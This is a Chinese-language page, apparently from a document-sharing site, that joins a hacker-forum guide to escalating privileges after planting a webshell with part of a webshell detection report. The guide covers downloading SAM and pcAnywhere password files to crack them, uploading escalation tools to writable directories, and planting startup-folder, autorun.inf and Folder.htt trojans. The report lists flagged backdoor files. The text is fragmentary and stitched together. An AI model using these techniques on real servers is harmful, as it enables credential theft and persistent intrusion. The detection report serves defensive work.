最全的WEBSHELL提权方法总结 在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RA V\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM :( 错 CAcls命令

木马(WEBSHELL)检测报告

木马(WEBSHELL)检测报告 以下截图是:木马(WEBSHELL)的位置、木马 (WEBSHELL)和疑似木马(WEBSHELL)的说明、文 件的大小、修改时间、验证值 1 User-Agent利用https://www.wendangku.net/doc/129628197.html,\inc.asp 2 大型脚本https://www.wendangku.net/doc/129628197.html,\#d.b$\#zf11.%v1.asa 2 大型脚本https://www.wendangku.net/doc/129628197.html,\#d.b$\#zf11.%v1_fixed.asa 2 大型脚本https://www.wendangku.net/doc/129628197.html,\#d.b$\复件#zf11.%v1.asa 5 多功能大马https://www.wendangku.net/doc/129628197.html,\cert\80sec.asp 1 关键字:phpinfo() https://www.wendangku.net/doc/129628197.html,\cert\test.php 1 服务器状况检测https://www.wendangku.net/doc/129628197.html,\CommonAdministrator\Admin_check.asp 1 服务器状况检测https://www.wendangku.net/doc/129628197.html,\CommonAdministrator\zf11_check.asp 1 User-Agent利用https://www.wendangku.net/doc/129628197.html,\Include\Conn_Head.asp 4 (内藏)Execute {参数:request(.. https://www.wendangku.net/doc/129628197.html,\other\zf11_Md5.asp 5 Encode加密|exec执行|列目录|?. https://www.wendangku.net/doc/129628197.html,\Vote\zzxx.asp

1 服务器状况检测https://www.wendangku.net/doc/129628197.html,\images\CommonAdministrator\Admin_check.asp 1 Adodb.Stream生成后门:[] https://www.wendangku.net/doc/129628197.html,\images\CommonAdministrator\createjs.asp 1 服务器状况检测https://www.wendangku.net/doc/129628197.html,\images\CommonAdministrator\zf11_check.asp 1 Adodb.Stream生成后门:[] https://www.wendangku.net/doc/129628197.html,\images\CommonAdministrator\gg1\createjs.asp 80SEC.ASP木马(WEBSHELL)源代码:

相关文档
相关文档 最新文档